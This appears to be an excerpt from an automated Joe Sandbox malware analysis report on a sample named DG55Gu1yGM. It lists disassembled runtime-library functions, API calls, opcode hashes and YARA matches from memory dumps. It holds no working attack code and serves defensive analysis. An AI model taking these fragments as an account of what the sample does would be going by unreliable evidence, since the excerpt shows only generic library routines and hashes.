                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3864826663-0
                                                                                                                                                                                                                                        • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                        • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 02152141: GetLastError.KERNEL32(?,?,0214A9EC,?,00000000,?,0214CDE6,0212247E,00000000,?,00451F20), ref: 02152145
                                                                                                                                                                                                                                          • Part of subcall function 02152141: _free.LIBCMT ref: 02152178
                                                                                                                                                                                                                                          • Part of subcall function 02152141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021521B9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02151444
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215145D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215148F
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 02151498
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021514A4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorLast
                                                                                                                                                                                                                                        • String ID: C
                                                                                                                                                                                                                                        • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                        • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                                                                                                                                                                                                        • Instruction ID: 1f96c16e39514c5c7dd4696c4b36c56030514b787d9461cc52c4e21015c2c68a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8B11575A41229EFDB25DF28C884BA9B7B5FB08314F1045EAD86DA7350D730AE90CF80
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                                                                                                                                                                                                        • Instruction ID: 6a8a12aa092e520d54527652bebb66444823b46418dad9658c774e153f887e89
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8561A471980225EFDB20DF68C842B9ABBF5EF45710F2442EAED64EB241D7719941CF90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                        • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                        • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0215425F,?,?,?,?,?,?), ref: 02153B2C
                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 02153BA7
                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 02153BC2
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 02153BE8
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,0215425F,00000000,?,?,?,?,?,?,?,?,?,0215425F,?), ref: 02153C07
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0215425F,00000000,?,?,?,?,?,?,?,?,?,0215425F,?), ref: 02153C40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                        • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                                                                                                                                                                                                        • Instruction ID: be00d781b372c3c36378d37014bed2c16876b296bbfc14142239cc611d8f0a56
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5951D575900219EFCB10CFA8D884AEEBBF5EF09714F14419AE965E7391D7309A81CF64
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                        • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                        • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02144ACD
                                                                                                                                                                                                                                          • Part of subcall function 02144D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02144800), ref: 02144DAC
                                                                                                                                                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02144AE2
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144AF1
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02144AFF
                                                                                                                                                                                                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02144B75
                                                                                                                                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02144BB5
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02144BC3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3151764488-0
                                                                                                                                                                                                                                        • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                        • Instruction ID: 871241d299872db596c86fcc788082bf603c03df7d5c7aa2a1b714b3aaec6c49
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F731E639A402159FCF18EF68C881B6DB3B6FF44320F214566E929AB241DF70EE15CB94
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                                                                                                                                                                                                        • Instruction ID: a9caa8a928f6b9fdedff8fc61d8b71c4bbbbb78721606a9935202dd8373cff20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7911B471584129FFDB252F768C48D6B7AADEF82761B110AB5FC39C7240DF308902CAA0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                        • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0215A331: _free.LIBCMT ref: 0215A35A
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A638
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A643
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A64E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A6A2
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A6AD
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A6B8
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0215A6C3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                        • Instruction ID: 381732e80f92289c5a8e345c107efc5cfbfa7df7b048c66456b090b09f108c6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 471172316C4B24EEDE60B771CC49FCB77DEDF00740F400DAAAAB9AA250D764B5548E90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                        • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 02132667
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 0213266D
                                                                                                                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 0213269A
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 021326A4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02130DA0,?,?,?,00000000), ref: 021326B6
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021326CC
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 021326DA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4227777306-0
                                                                                                                                                                                                                                        • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                        • Instruction ID: dcd173175c0b0f36d6569081422e67ebc934e3bc49d12ad18deaa872e233b68f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01F275680125ABDB26BF65EC08FAF376AAF42B52B100435FC05D3060EB34DE048BE8
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4227777306-0
                                                                                                                                                                                                                                        • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                        • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0213670B), ref: 021324B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021324C4
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021324D2
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0213670B), ref: 02132500
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02132507
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0213670B), ref: 02132522
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0213670B), ref: 0213252E
                                                                                                                                                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02132544
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02132552
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                        • String ID: kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                        • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                        • Instruction ID: a74a6c5c94aeb9bd67de0fe2ec92db029063b6cc8f87f4958e337263bc7c364d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13F0A9769403107FF7123B757C5995B3FAEDE4AA273200636F811E2191EB75C9018559
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                                                        • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 2005118841-3619870194
                                                                                                                                                                                                                                        • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                        • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021519AF
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: HeapFree.KERNEL32(00000000,00000000,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?), ref: 021536E7
                                                                                                                                                                                                                                          • Part of subcall function 021536D1: GetLastError.KERNEL32(?,?,0215A35F,?,00000000,?,00000000,?,0215A603,?,00000007,?,?,0215A9F7,?,?), ref: 021536F9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021519C1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021519D4
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021519E5
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 021519F6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DG55Gu1yGM.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID: 8JV
                                                                                                                                                                                                                                        • API String ID: 776569668-1571241588
                                                                                                                                                                                                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                        • Instruction ID: 1725d44b4e6a4aee4839877d31c7c9274626910bd7a396e28f3d6006823ec2c2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FF01D70D44320EB9F616F14AC844043BA1AF0976270006EAF826977B2C774D9A2DFCE
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                          • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
